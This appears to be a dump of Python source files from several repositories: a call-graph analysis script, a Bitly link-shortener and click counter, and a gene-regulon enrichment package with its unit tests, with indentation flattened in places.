cg2[caller].remove(fn)
fn_results.append( (size - biggest_component(strongly_connected_components(cg2)), fn, "called by", caller) )
result_set.add( (caller, fn) )
print
total = len(big_component_fns)
idx = 0
for fn in big_component_fns:
fn_calls = callgraph[fn].intersection(bcf_set)
idx += 1
if len(fn_calls) != 1:
continue
print "Pass 3/3: %d/%d\r"%(idx, total),
sys.stdout.flush()
callee = fn_calls.pop()
if (fn, callee) in result_set:
continue
assert len(fn_calls) == 0
cg2 = copy.deepcopy(callgraph)
cg2[fn].remove(callee)
fn_results.append( (size - biggest_component(strongly_connected_components(cg2)), callee, "called by", fn) )
print
return (function_bottlenecks, call_bottlenecks)
if __name__ == '__main__':
p = Parser()
for fname in sys.argv[1:]:
with open(fname, 'r') as f:
p.parse_callgraph_file(f)
    sys.stdout.flush()
print "Building callgraph"
callgraph = p.extract_callgraph()
print "Finding strongly connected components"
sccs = strongly_connected_components(callgraph)
print "Finding the transitive closure of the callgraph.."
closure = transitive_closure(callgraph)
print "Finding bottlenecks..."
bottlenecks = connection_bottlenecks(callgraph)
data = {
'callgraph' : callgraph,
'sccs' : sccs,
'closure' : closure,
'bottlenecks' : bottlenecks }
with open('callgraph.pkl', 'w') as f:
cPickle.dump(data, f)
```
|
{
"source": "jest995/count-click",
"score": 3
}
|
#### File: jest995/count-click/main.py
```python
import argparse
import os
from urllib.parse import urlsplit
import requests
from dotenv import load_dotenv
def shorten_link(link, headers):
payload = {"long_url": link}
url = "https://api-ssl.bitly.com/v4/bitlinks"
response = requests.post(url, headers=headers, json=payload)
response.raise_for_status()
bitlink = response.json()["link"]
return bitlink
def count_click(bitlink, headers):
payload = {"unit": "day", "units": -1}
url = f"https://api-ssl.bitly.com/v4/bitlinks/{bitlink}/clicks/summary"
response = requests.get(url, headers=headers, params=payload)
response.raise_for_status()
total_clicks = response.json()["total_clicks"]
return total_clicks
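# A hedged end-to-end sketch (token and links are placeholders):
#   headers = {"Authorization": "Bearer <BITLY_TOKEN>"}
#   bitlink = shorten_link("https://example.com/some/long/path", headers)  # e.g. "https://bit.ly/XXXX"
#   clicks = count_click("bit.ly/XXXX", headers)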
def is_bitlink(link, headers):
url = f"https://api-ssl.bitly.com/v4/bitlinks/{link}"
response = requests.get(url, headers=headers)
return response.ok
if __name__ == "__main__":
load_dotenv()
TOKEN = os.environ['BITLY_TOKEN']
HEADERS = {
"Authorization": f"Bearer {TOKEN}"
}
parser = argparse.ArgumentParser()
parser.add_argument('link', nargs='?')
namespace = parser.parse_args()
if namespace.link:
user_input = namespace.link
else:
        user_input = input("Enter a link:\n")
parse_link = urlsplit(user_input)
user_link = parse_link.netloc + parse_link.path
if is_bitlink(user_link, HEADERS):
try:
clicks_count = count_click(user_link, HEADERS)
except requests.exceptions.HTTPError:
            print("Invalid bitlink")
else:
            print(f"Your link was clicked {clicks_count} time(s)")
else:
try:
bitlink = shorten_link(user_input, HEADERS)
except requests.exceptions.HTTPError:
print("Неправильная ссылка")
else:
        print('Bitlink', bitlink)
```
|
{
"source": "JEstabrook/regulon-enrichment",
"score": 2
}
|
#### File: regulon-enrichment/enricher/enrich.py
```python
import warnings
import os
import functools
import pandas as pd
import numpy as np
from tqdm import tqdm
from sklearn.utils.validation import check_array
import enricher.regulon.regulon_enrichment as regulon_enrichment
import enricher.features.expression_utils as expression_utils
import enricher.regulon.regulon_utils as regulon_utils
import argparse
warnings.simplefilter("ignore", UserWarning)
test = 'test'
if __name__ == '__main__':
DATA_PATH = os.path.join(os.getcwd(), 'data')
else:
dirname = os.path.dirname(__file__)
DATA_PATH = os.path.join(dirname, 'data')
sif_file = DATA_PATH + '/PathwayCommons9.All.hgnc.sif.gz'
sec_intx_file = DATA_PATH + '/secondary_intx_regulon.pkl'
class Error(Exception):
"""Base class for other exceptions"""
class OmicError(Error):
"""Raised when duplications in omic features or samples are detected"""
class Enrichment(object):
"""Base enrichment class for predicting regulon enrichment from -omic datasets.
Args:
        cohort (str): Name of the cohort/dataset being analyzed.
        expr (:obj:`pd.DataFrame`, shape = [n_feats, n_samps]): Expression matrix of TPM/RPKM values.
        regulon (:obj: `pandas DataFrame`): Optional pre-computed regulon of regulator-target interactions.
        regulon_size (int): Minimum number of edges for a given regulator.
        sec_intx (str): Path to pre-compiled secondary interaction network.
        thresh_filter (float): Standard deviation cutoff used to drop near-constant features.
"""
def __init__(self, cohort, expr, regulon=None, regulon_size=15, sec_intx=sec_intx_file,
thresh_filter=0.1):
if not isinstance(expr, pd.DataFrame):
raise TypeError("`expr` must be a pandas DataFrame, found "
"{} instead!".format(type(expr)))
if len(set(expr.index)) != expr.shape[0]:
print(len(set(expr.index)))
print(expr.shape)
raise OmicError("Duplicate feature names in {cohort} dataset!".format(cohort=cohort))
if len(set(expr.columns)) != expr.shape[1]:
raise OmicError("Duplicate sample names in {cohort} dataset!".format(cohort=cohort))
self.cohort = cohort
self.expr = expr
if regulon is None:
self.regulon = regulon_utils.read_pickle(sec_intx)
else:
self.regulon = regulon
self.scaler_type = None
self.scaled = False
self.regulon_size = regulon_size
self.regulon_weights = None
self.thresh_filter = thresh_filter
self.total_enrichment = None
self.delta = None
self.local_enrichment = None
self.regulators = None
self.quant_nes = None
def __str__(self):
return """------\nCohort: {}\nn-features: {}\nn-samples: {}\nscaler: {}\nscaled:\
{}\nregulon threshold: {}\nregulon nodes: {}\nregulon edges: {}\n------\n""".\
format(self.cohort,
self.expr.shape[0],
self.expr.shape[1],
self.scaler_type,
self.scaled, self.regulon_size,
len(self.regulon.UpGene.unique()),
self.regulon.shape[0])
def __repr__(self):
return """------\nCohort: {}\nn-features: {}\nn-samples: {}\nscaler: {}\nscaled: {}\
\nregulon threshold: {}\nregulon nodes: {}\nregulon edges: {}\n------\n""".\
format(self.cohort,
self.expr.shape[0],
self.expr.shape[1],
self.scaler_type,
self.scaled,
self.regulon_size,
len(self.regulon.UpGene.unique()),
self.regulon.shape[0])
@staticmethod
def _preprocess_data(expr, scaler_type='robust', thresh_filter=0.1):
""" Centers expression data based on a specified data scaler algorithm
Args:
expr (pandas DataFrame obj): pandas DataFrame of [n_features, n_samples]
scaler_type (str): Scaler to normalized features/samples by:
standard | robust | minmax | quant
thresh_filter (float): Prior to normalization remove features that have
a standard deviation per feature less than {thresh_filter}
Returns:
scaled_frame (:obj: `pandas DataFrame`) : pandas DataFrame containing
scaled expression data of shape [n_samples, n_features]
"""
# By default, the input is checked to be a non-empty 2D array containing
# only finite values.
_ = check_array(expr)
scaler_opt = {'standard': expression_utils.StandardScaler(),
'robust': expression_utils.RobustScaler(),
'minmax': expression_utils.MinMaxScaler(),
'quant': expression_utils.QuantileTransformer()}
if scaler_type not in scaler_opt:
raise KeyError('{scaler_type} not supported scaler_type!'
' Supported types include: {keys}'.format(
scaler_type=scaler_type, keys=' | '.join(scaler_opt.keys())))
scaler = scaler_opt[scaler_type]
# Transpose frame to correctly orient frame for scaling and machine learning algorithms
print('--- log2 normalization ---')
expr_t = expr[(expr.std(axis=1) > thresh_filter)].T
expr_lt = expression_utils.log_norm(expr_t)
print('--- Centering features with {} scaler ---'.format(scaler_type))
scaled_frame = pd.DataFrame(scaler.fit_transform(expr_lt),
index=expr_lt.index,
columns=expr_lt.columns)
return scaled_frame
@staticmethod
def _prune_regulon(expr, regulon, regulon_size):
""" Prunes regulon with secondary interactions that do not meet
the necessary number of downstream interactions metric {regulon_size}
Args:
expr (pandas DataFrame obj): pandas DataFrame of [n_samples, n_features]
regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight
interactions between regulator and downstream members of its regulon
of shape [len(Target), ['Regulator','Target','MoA','likelihood']
regulon_size (int) : number of downstream interactions required for a
given regulator in order to calculate enrichment score
Returns:
filtered_regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight
interactions between regulator and downstream members of its regulon of shape :
[len(Target), ['Regulator','Target','MoA','likelihood']
"""
expr_filtered_regulon = regulon[
((regulon.UpGene.isin(expr.columns)) & (regulon.DownGene.isin(expr.columns)))].\
set_index('UpGene')
idx = (expr_filtered_regulon.index.value_counts() >= regulon_size)
filtered_regulon = expr_filtered_regulon.loc[idx[idx == True].index].reset_index()
edges = list(set(filtered_regulon.UpGene) | set(filtered_regulon.DownGene))
sub_expr = expr.loc[:,edges]
return filtered_regulon, sub_expr
@staticmethod
def _structure_weights(regulator, pruned_regulon, f_statistics, r_frame, p_frame):
""" Calculates weights associated with regulators. Weights are the summation of
the F-statistic and absolute spearman correlation coefficient. The weight
retains the sign of the spearman correlation coefficient.
Args:
regulator (str): A feature to assign weights to downstream interactions
pruned_regulon (:obj:`pd.DataFrame`, shape = [n_interactions, 3]
f_statistics (dict) : Dictionary with key:{regulator} key and
r_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
p_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
Returns:
weights_ordered (:obj:`pd.DataFrame`), shape = [n_interactions, 3]
"""
sub_regul = pruned_regulon[(pruned_regulon['UpGene'] == regulator)]
targs = sub_regul.DownGene
p_ = p_frame.loc[targs, regulator]
p_.name = 'likelihood'
f_ = f_statistics[regulator][0]
r_ = r_frame.loc[targs, regulator]
w_ = (f_ + abs(r_)) * np.sign(r_)
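        # e.g. for a given target, an F-statistic of 4.0 and a spearman r of -0.6
        # give a weight of (4.0 + 0.6) * sign(-0.6) = -4.6: the magnitude combines
        # both statistics while the sign follows the direction of the correlation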
w_.index.name = 'Target'
w_.name = 'MoA'
weights = w_.to_frame()
weights['likelihood'] = p_
weights['Regulator'] = regulator
weights_ordered = weights.reset_index().\
reindex(['Regulator', 'Target', 'MoA', 'likelihood'], axis=1)\
.set_index('Regulator')
return weights_ordered
def scale(self, scaler_type='robust', thresh_filter=0.1):
""" Fit and scale expression data based on a specified data scaler algorithm
Args:
scaler_type (str): Scaler to normalized features/samples by:
standard | robust | minmax | quant
            thresh_filter (float): Prior to normalization remove features whose standard
                deviation across samples is less than {thresh_filter}
"""
self.scaler_type = scaler_type
        if scaler_type is None:
warnings.warn('Proceeding without scaling dataset!')
self.expr = self.expr.T
else:
self.expr = self._preprocess_data(self.expr, self.scaler_type, thresh_filter)
self.scaled = True
def assign_weights(self):
"""
Generate normalized likelihood weights and assigns those weights to the absolute gene
expression signature
"""
if not self.scaled:
warnings.warn('Assigning interaction weights without scaling dataset!')
pruned_regulon, sub_expr = self._prune_regulon(self.expr, self.regulon, self.regulon_size)
self.expr = sub_expr
# noinspection PyTypeChecker
r, p = regulon_utils.spearmanr(self.expr)
r_frame = pd.DataFrame(r, columns=self.expr.columns, index=self.expr.columns)
p_frame = pd.DataFrame(p, columns=self.expr.columns, index=self.expr.columns)
F_statistics = {regulator: regulon_utils.f_regression(
self.expr.reindex(frame.DownGene, axis=1),
self.expr.reindex([regulator], axis=1).values.ravel())
for regulator, frame in pruned_regulon.groupby('UpGene')}
weights = pd.concat([self._structure_weights(regulator,
pruned_regulon,
F_statistics,
r_frame,
p_frame)
for regulator in F_statistics])
self.regulon_weights = weights[~np.isinf(weights.MoA)]
def calculate_enrichment(self):
"""
Subset and generate regulator activity scores based on rank ordering of up-regulated
and down-regulated targets
"""
if self.regulon_weights is None:
raise TypeError("`regulon_weights` must be assigned prior to enrichment calculation,"
" found {} instead!".format(type(self.regulon_weights)))
quant_nes = regulon_enrichment.quantile_nes_score(self.regulon_weights, self.expr.T)
self.quant_nes = quant_nes
self.regulators = self.regulon_weights.index.unique()
print('--- Calculating regulon enrichment scores ---')
nes_list, local_enrich_list, delta_list = zip(*list(map(functools.partial(regulon_enrichment.score_enrichment,
expr=self.expr,
regulon=self.regulon_weights,
quant_nes=quant_nes),
tqdm(self.regulators))))
self.total_enrichment = pd.concat(nes_list, axis=1)
self.local_enrichment = pd.concat(local_enrich_list, axis=1)
self.delta = pd.concat(delta_list, axis=1)
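# A minimal library-style sketch of the workflow that main() wraps below (expr_df
# is a hypothetical [n_features, n_samples] TPM/RPKM DataFrame):
#   enr = Enrichment(cohort='toy', expr=expr_df)
#   enr.scale(scaler_type='robust')
#   enr.assign_weights()
#   enr.calculate_enrichment()
#   enr.total_enrichment   # per-sample activity scores for each regulator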
def main():
parser = argparse.ArgumentParser(
"Infer transcription factor activity from gene expression data utilizing pathway and molecular interactions "
"and mechanisms available through Pathway Commons."
)
parser.add_argument('cohort', type=str, help="which TCGA cohort to use")
parser.add_argument('expr', type=str, help="which tab delimited expression matrix to use "
"shape : [n_features, n_samples]"
"units : TPM, RPKM")
parser.add_argument('out_dir', type=str, help="output directory")
parser.add_argument('--regulon', type=str, help="optional regulon containing weight interactions between "
"regulator and downstream members of its regulon"
"shape : [len(Target), ['Regulator','Target','MoA','likelihood']",
default=None)
parser.add_argument('--regulon_size', type=int, help="number of downstream interactions required for a given "
"regulator in order to calculate enrichment score", default=15)
parser.add_argument('--sec_intx', type=str, help="path to pre-compiled serialized secondary "
"interaction network", default=sec_intx_file)
parser.add_argument('--scaler_type', type=str, help="Scaler to normalized features/samples by: "
"standard | robust | minmax | quant", default='robust')
parser.add_argument('--thresh_filter', type=float, help="Prior to normalization remove features that have a standard "
"deviation per feature less than {thresh_filter}",
default=0.1)
# parse command line arguments
args = parser.parse_args()
expr_matrix = pd.read_table(args.expr,index_col=0)
enr_obj = Enrichment(cohort=args.cohort, expr=expr_matrix, regulon=args.regulon,
regulon_size=args.regulon_size, sec_intx=args.sec_intx,
thresh_filter=args.thresh_filter)
print(enr_obj)
print('\nScaling data...\n')
enr_obj.scale(scaler_type=args.scaler_type, thresh_filter=args.thresh_filter)
print('\nData scaled!\n')
print('\nAssigning weights...\n')
enr_obj.assign_weights()
print('\nWeights assigned!\n')
print('\nCalculating enrichment...\n')
enr_obj.calculate_enrichment()
print('\nEnrichment scores calculated!\n')
regulon_utils.ensure_dir(args.out_dir)
regulon_utils.write_pickle(enr_obj, os.path.join(args.out_dir,'{}_enrichment.pkl'.format(args.cohort)))
enr_obj.total_enrichment.to_csv(os.path.join(args.out_dir,'{}_regulon_enrichment.tsv'.format(args.cohort)),sep='\t')
print('Complete')
if __name__ == "__main__":
main()
```
#### File: enricher/regulon/regulon_utils.py
```python
import warnings
warnings.simplefilter("ignore", UserWarning)
import pandas as pd
import dill as pickle
import functools
import os
from sklearn.feature_selection import f_regression, mutual_info_regression
from sklearn.mixture import BayesianGaussianMixture as GMM
from scipy.stats import spearmanr, pearsonr
import scipy.stats as st
import numpy as np
from tqdm import tqdm
import timeit
def load_sif():
return pd.read_csv(sif_file, names = ['UpGene', 'Type', 'DownGene'], sep = '\t', header = None)
def filter_sif(sif, intx_type = 'controls-expression-of'):
return sif[(sif['Type'] == intx_type)]
def load_secondary_itx_sif():
""" Load precompiled secondary interaction sif
Returns:
(pandas.DataFrame): pandas.DataFrame obj of length: n interactions and
columns: ['UpGene', 'Type', 'DownGene']
"""
return pd.read_csv(sec_intx_file, names = ['UpGene', 'Type', 'DownGene'], sep = '\t', header = None)
def write_pickle(obj, relnm):
""" Serialize object to pickle and write to disk at relnm
Args:
obj (`:obj:`) : Python object to be pickled
relnm (str) : Relative name/path to pickle on disk
Returns:
'Serialized object to disk at {}'.format(relnm)
"""
with open(relnm, 'wb') as f:
pickle.dump(obj, f, protocol = -1)
return 'Serialized object to disk at {}'.format(relnm)
def read_pickle(relnm):
""" Read serialized object from pickle on disk at relnm
Args:
relnm (str) : Relative name/path to pickled object
Returns:
obj (`:obj: unpickled object`)
"""
with open(relnm, 'rb') as f:
obj = pickle.load(f)
print('Loaded object from disk at {}'.format(relnm))
return obj
def ensure_dir(relnm):
""" Accept relative filepath string, create it if it doesnt already exist
return filepath string
Args:
relnm (str) : Relative name/path
Returns:
relnm (str)
"""
d = os.path.join(os.getcwd(), relnm)
if not os.path.exists(d):
print('--- path does not exist : {} ---'.format(d))
print('--- constructing path : {} ---'.format(d))
os.makedirs(d)
return relnm
def traverse_interactions(regulator, filt_sif):
""" Parse interaction network and add secondary interactions on a per regulator basis
Args:
regulator (str): Regulator to expand interaction network
filt_sif (pandas.DataFrame): pandas.DataFrame obj of length: n interactions and
columns: ['UpGene', 'Type', 'DownGene']
Returns:
comb_idx (pandas.DataFrame):pandas.DataFrame obj of length: n interactions + secondary interactions and
columns: ['UpGene', 'Type', 'DownGene']
"""
sub_reg = filt_sif[(filt_sif.UpGene == regulator)]
down_genes = sub_reg.DownGene.unique()
secondary_itx = filt_sif[(filt_sif.UpGene.isin(down_genes))]
secondary_itx.UpGene = regulator
comb_idx = pd.concat([sub_reg, secondary_itx])
comb_idx.Type = 'controls-expression-of'
comb_idx = comb_idx.drop_duplicates()
comb_idx = comb_idx[(comb_idx.DownGene != regulator)]
return comb_idx
def generate_expanded_regulon():
""" Generates an expanded Pathway Commons regulon with secondary down-stream interactions for
regulators that control the expression of other regulators
Returns:
Nothing - Generates a pickled pandas dataframe for future reference/use
"""
print('--- Generating regulon with primary and secondary interactions ---')
sif = load_sif()
filt_sif = filter_sif(sif)
regulators = filt_sif.UpGene.unique()
regulon_list = list(map(functools.partial(traverse_interactions, filt_sif = filt_sif), regulators))
regulon = pd.concat(regulon_list)
regulon.set_index('UpGene', inplace = True)
regulon.reset_index(inplace=True)
print('---- Regulon constructed ---')
write_pickle(regulon, '../data/secondary_intx_regulon.pkl')
def bgm_moa(regul_weights):
""" Fits regulon mode of activation weights to a bayesian gaussian mixture model with three components and computes
the probability of the three distributions (repression, non-influential, activation) for each regulator
Args:
regul_weights (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
Returns:
Mode (numpy.ndarray) : array of shape [n_targets, 1] with the signed mode of activation for each target
(positive values indicate activation, negative values indicate repression)
"""
g = GMM(n_components = 3, max_iter = 1000)
sub_reg = regul_weights.copy()
sub_reg_vals = sub_reg.MoA.values.reshape(-1, 1)
g.fit(sub_reg_vals)
mu = g.means_.flatten()
sigma = np.sqrt(g.covariances_).flatten()
fit = sorted(list(zip(mu, sigma)))
activation = (st.norm.cdf(sub_reg_vals, fit[2][0], fit[2][1]))
repression = 1 - st.norm.cdf(sub_reg_vals, fit[0][0], fit[0][1])
total_lower = 1 - st.norm.cdf(sub_reg_vals, fit[1][0], fit[1][1])
total_upper = (st.norm.cdf(sub_reg_vals, fit[1][0], fit[1][1]))
copy_target = sub_reg.copy()
copy_target['up'] = 0
copy_target['down'] = 0
copy_target.loc[(copy_target.MoA >= 0), 'up'] = 1
copy_target.loc[(copy_target.MoA <= 0), 'down'] = 1
up_moa = copy_target.up.values.reshape(copy_target.shape[0], 1)
down_moa = copy_target.down.values.reshape(copy_target.shape[0], 1)
Mode = (activation / (repression + total_lower + activation) * up_moa) -\
(repression / (repression + total_upper + activation) * down_moa)
return Mode
def prune_regulon(expr, regulon, regulon_size):
""" Prunes regulon with secondary interactions that do not meet the necessary number of downstream interactions
metric {regulon_size}
Args:
expr (pandas DataFrame obj): pandas DataFrame of [n_samples, n_features]
regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
regulon_size (int) : number of downstream interactions required for a given regulator in order to calculate
enrichment score
Returns:
filtered_regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator
and downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
"""
expr_filtered_regulon = regulon[((regulon.UpGene.isin(expr.columns)) & (regulon.DownGene.isin(expr.columns)))]
expr_filtered_regulon.set_index('UpGene', inplace=True)
idx = (expr_filtered_regulon.index.value_counts() >= regulon_size)
filt_idx = idx[idx==True]
filtered_regulon = expr_filtered_regulon.loc[filt_idx.index]
filtered_regulon.reset_index(inplace=True)
return filtered_regulon
def regulon_weight_assignment(regulator, expr, filtered_regulon):
""" Assigns probability and weights for regulator - target interactions
Args:
regulator (str): Regulator to expand interaction network
expr (:obj: `pandas DataFrame`) : pandas DataFrame containing scaled expression data of
shape [n_samples, n_features]
filtered_regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator
and downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
Returns:
regul_weights (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
"""
sub_reg = filtered_regulon[(filtered_regulon['UpGene'] == regulator)]
X = expr.reindex(sub_reg.DownGene.values, axis = 1).dropna(axis = 1)
y = expr.reindex([regulator], axis = 1)
spr_results = X.apply(lambda col: spearmanr(col, y.iloc[:, 0]), axis = 0).apply(pd.Series)
spr_result = spr_results[0]
spr_pvalues = spr_results[1]
f_test, _ = f_regression(X, y.values.ravel())
weights = f_test
weights_spr = weights + abs(spr_result)
regul_weights = (weights_spr * np.sign(spr_result)).to_frame()
regul_weights.columns = ['MoA']
regul_weights.index.name = 'Target'
regul_weights.reset_index(inplace = True)
regul_weights['Regulator'] = regulator
regul_weights['likelihood'] = spr_pvalues.values
regul_weights = regul_weights.reindex(['Regulator', 'Target', 'MoA', 'likelihood'], axis = 1)
regul_weights.set_index('Regulator', inplace = True)
regul_weights = regul_weights[~np.isinf(regul_weights.MoA)]
return regul_weights
def structure_weights(regulator, pruned_regulon, f_statistics, r_frame, p_frame):
""" Calculates weights associated with regulators. Weights are the summation of the F-statistic and absolute
spearman correlation coefficient. The weight retains the sign of the spearman correlation coefficient.
Args:
regulator (str): A feature to assign weights to downstream interactions
pruned_regulon (:obj:`pd.DataFrame`, shape = [n_interactions, 3]
f_statistics (dict) : Dictionary keyed by regulator containing the F-statistics for that regulator's targets
r_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
p_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
Returns:
weights_ordered (:obj:`pd.DataFrame`), shape = [n_interactions, 3]
"""
sub_regul = pruned_regulon[(pruned_regulon['UpGene'] == regulator)]
targs = sub_regul.DownGene
p_ = p_frame.loc[targs, regulator]
p_.name = 'likelihood'
f_ = f_statistics[regulator][0]
r_ = r_frame.loc[targs, regulator]
w_ = (f_ + abs(r_)) * np.sign(r_)
w_.index.name = 'Target'
w_.name = 'MoA'
weights = w_.to_frame()
weights['likelihood'] = p_
weights['Regulator'] = regulator
weights_ordered = weights.reset_index().reindex(['Regulator', 'Target', 'MoA', 'likelihood'],
axis = 1).set_index('Regulator')
return weights_ordered
def generate_bolstered_regulon(expr, cohort, regulon_size=15):
""" Calculate weights for PC regulon and a dataset using mutual information, f-statistic to test for linear
relationships, and the spearman correlation coefficient to determine the mode of regulation
Args:
expr (:obj: `pandas DataFrame`) : pandas DataFrame containing scaled expression data of
shape [n_samples, n_features]
cohort (str) : name of cohort to associate with compiled regulon
regulon_size (int) : required number of downstream interactions for a given regulator
Returns:
regul_weights (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
"""
bolstered_relnm = os.path.join(dirname, '../experiments/{0}/data/{0}_bolstered_regulon.pkl'.format(cohort))
# Check to see if bolstered regulon exists
if os.path.isfile(bolstered_relnm):
print('--- loading context specific regulon ---')
total_regulon = read_pickle(bolstered_relnm)
else:
if os.path.isfile(sec_intx_file):
print('--- loading unfiltered regulon ---')
regulon = read_pickle(sec_intx_file)
else:
generate_expanded_regulon()
regulon = read_pickle(sec_intx_file)
print('--- pruning regulon ---')
filtered_regulon = prune_regulon(expr, regulon, regulon_size)
regulators = filtered_regulon.UpGene.unique()
print('--- compiling regulon of {} regulators and {} interactions with a minimum of {} interactions ---'.
format(len(regulators), filtered_regulon.shape[0], regulon_size))
regulon_list = list(map(functools.partial(regulon_weight_assignment, expr=expr,
filtered_regulon = filtered_regulon), tqdm(regulators)))
total_regulon = pd.concat(regulon_list)
relnm = os.path.join(dirname, '../experiments/{0}/data'.format(cohort))
ensure_dir(relnm)
write_pickle(total_regulon, os.path.join(relnm, '{}_bolstered_regulon.pkl'.format(cohort)))
return total_regulon
```
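Both `regulon_weight_assignment` and `structure_weights` use the same weighting rule: the F-statistic plus the absolute Spearman correlation, signed by the Spearman correlation. The following toy sketch illustrates that rule on made-up data; the values and random seed are for demonstration only.

```python
# Toy illustration of the weight formula above: w = (F + |rho|) * sign(rho).
import numpy as np
from scipy.stats import spearmanr
from sklearn.feature_selection import f_regression

rng = np.random.default_rng(0)
y = rng.normal(size=50)                                # "regulator" expression
X = np.column_stack([y + rng.normal(size=50),          # positively coupled target
                     -y + rng.normal(size=50)])        # negatively coupled target

f_test, _ = f_regression(X, y)
rho = np.array([spearmanr(X[:, j], y)[0] for j in range(X.shape[1])])
moa = (f_test + np.abs(rho)) * np.sign(rho)            # signed mode-of-activation weights
print(moa)                                             # first entry positive, second negative
```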
#### File: enricher/tests/test_enrichment.py
```python
import os
import sys
base_dir = os.path.dirname(__file__)
data_dir = os.path.join(base_dir, "resources")
sys.path.extend([os.path.join(base_dir, '../..')])
from sklearn.utils.validation import check_array
from enricher import enrich
import enricher.regulon.regulon_enrichment as regulon_enrichment
import enricher.features.expression_utils as expression_utils
import enricher.regulon.regulon_utils as regulon_utils
from enricher.features.expression_utils import log_norm
from tqdm import tqdm
import warnings
import unittest
import pandas as pd
import numpy as np
import scipy.stats as st
import functools
def load_test_sif(sif='test.sif'):
return pd.read_table(os.path.join(data_dir, sif), index_col=0)
def load_test_expr(expr='test_expr.tsv'):
return pd.read_csv(os.path.join(data_dir, expr), index_col=0, sep = '\t')
class EnrichTestCase(unittest.TestCase):
def test_load_test_sif(self):
sif = load_test_sif()
self.assertSequenceEqual(sif.shape, (1302, 3))
def test_load_test_expr(self):
expr = load_test_expr()
self.assertSequenceEqual(expr.shape, (8723, 6))
def test_enrichment(self):
sif = load_test_sif()
expr = load_test_expr()
filt_sif = regulon_utils.filter_sif(sif)
enr = enrich.Enrichment(expr=expr, cohort = 'TEST', regulon=filt_sif)
self.assertSequenceEqual(enr.expr.shape, expr.shape)
self.assertSequenceEqual(enr.regulon.shape, filt_sif.shape)
self.assertEqual(enr.scaled, False)
self.assertEqual(enr.regulators, None)
self.assertEqual(enr.regulon_size, 15)
self.assertEqual(enr.regulon_weights, None)
self.assertEqual(enr.thresh_filter, 0.1)
self.assertEqual(enr.total_enrichment, None)
self.assertEqual(enr.quant_nes, None)
enr.scale()
self.assertEqual(enr.scaled, True)
enr.assign_weights()
self.assertSequenceEqual(enr.regulon_weights.shape, (433, 3))
self.assertAlmostEqual(enr.regulon_weights.MoA.mean(), 1.1555032640512617)
enr.calculate_enrichment()
self.assertSequenceEqual(enr.regulators.tolist(), ['TP53'])
self.assertSequenceEqual(enr.total_enrichment.shape, (6, 1))
if __name__ == '__main__':
unittest.main()
```
#### File: enricher/tests/test_regulon.py
```python
import os
import sys
base_dir = os.path.dirname(__file__)
data_dir = os.path.join(base_dir, "resources")
sys.path.extend([os.path.join(base_dir, '../..')])
import unittest
import warnings
import pandas as pd
from enricher.enrich import regulon_utils, regulon_enrichment
warnings.simplefilter("ignore", UserWarning)
def load_test_sif(sif='test.sif'):
return pd.read_table(os.path.join(data_dir, sif), index_col=0)
def load_test_expr(expr='test_expr.tsv'):
return pd.read_csv(os.path.join(data_dir, expr), index_col=0, sep = '\t')
class RegulonUtilsTestCase(unittest.TestCase):
def test_load_test_sif(self):
sif = load_test_sif()
self.assertSequenceEqual(sif.shape, (1302, 3))
def test_filter_sif(self):
sif = load_test_sif()
self.assertEqual(regulon_utils.filter_sif(sif).shape[0], 800)
self.assertEqual(regulon_utils.filter_sif(sif)['Type'].unique().tolist()[0], 'controls-expression-of')
def test_load_test_expr(self):
expr = load_test_expr().T
self.assertSequenceEqual(expr.shape, (6, 8723))
def test_prune_regulon(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
self.assertSequenceEqual(filtered_regulon.shape, (433, 3))
def test_regulon_weight_assignment(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
regul_weights = regulon_utils.regulon_weight_assignment('TP53', expr, filtered_regulon)
self.assertSequenceEqual(regul_weights.shape, (433, 3))
self.assertSequenceEqual(regul_weights.columns.tolist(), ['Target', 'MoA', 'likelihood'])
self.assertEqual(regul_weights.iloc[0, :].tolist()[0], 'AARS')
self.assertAlmostEqual(regul_weights.iloc[0, :].tolist()[1], 0.1724812122096268)
self.assertAlmostEqual(regul_weights.iloc[0, :].tolist()[2], 0.8717434402332361)
def test_quantile_nes_score(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
regul_weights = regulon_utils.regulon_weight_assignment('TP53', expr, filtered_regulon)
nes = regulon_enrichment.quantile_nes_score(regul_weights, expr.T)
self.assertSequenceEqual(nes.columns.tolist(),
['Test_A1', 'Test_A2', 'Test_A3', 'Test_D1', 'Test_D2', 'Test_D3'])
self.assertAlmostEqual(nes.values.mean(), -1.5392231513623145)
def test_score_enrichment(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
regul_weights = regulon_utils.regulon_weight_assignment('TP53', expr, filtered_regulon)
nes = regulon_enrichment.quantile_nes_score(regul_weights, expr.T)
enrichment = regulon_enrichment.score_enrichment('TP53', expr, regul_weights, nes)
self.assertAlmostEqual(enrichment.values.mean(), -1.6208941454109855)
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JEStaubach/playrestapi",
"score": 2
}
|
